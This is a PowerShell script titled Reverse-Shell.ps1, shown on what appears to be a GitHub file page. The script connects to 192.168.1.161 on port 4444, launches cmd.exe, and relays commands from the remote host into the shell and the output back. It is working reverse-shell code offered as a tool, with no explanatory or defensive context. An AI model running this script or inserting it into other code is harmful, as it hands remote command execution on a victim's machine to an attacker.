-
Notifications
You must be signed in to change notification settings - Fork 46
/
Copy pathReverse-Shell.ps1
87 lines (66 loc) · 1.8 KB
/
Reverse-Shell.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
function CleanUp {
if ($client.Connected -eq $true) {
$client.Close()
}
if ($process.ExitCode -ne $null) {
$process.Close()
}
exit
}
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect('192.168.1.161', 4444)
if ($client.Connected -ne $true) {
CleanUp
}
$stream = $client.GetStream();
$buffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputStream = $process.StandardInput
$outputStream = $process.StandardOutput
Start-Sleep 1
$encoding = New-Object System.Text.AsciiEncoding
while ($outputStream.Peek() -ne -1) {
$output += $encoding.GetString($outputStream.Read())
}
$stream.Write($encoding.GetBytes($output), 0, $output.Length)
$output = $null
while ($true) {
if ($client.Connected -ne $true) {
CleanUp
}
$pos = 0
$i = 1
while (($i -gt 0) -and ($pos -lt $buffer.Length)) {
$read = $stream.Read($buffer, $pos, $buffer.Length - $pos)
$pos += $read
if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {
break
}
if ($pos -gt 0) {
$string = $encoding.GetString($buffer, 0, $pos)
$inputStream.Write($string)
Start-Sleep 1
if ($process.ExitCode -ne $null) {
CleanUp
} else {
$output = $encoding.GetString($outputStream.Read())
while ($outputStream.Peek() -ne -1) {
$output += $encoding.GetString($outputStream.Read())
if ($output -eq $string) {
$output = ''
}
}
$stream.Write($encoding.GetBytes($output), 0, $output.Length);
$output = $null
$string = $null
}
} else {
CleanUp
}
}
}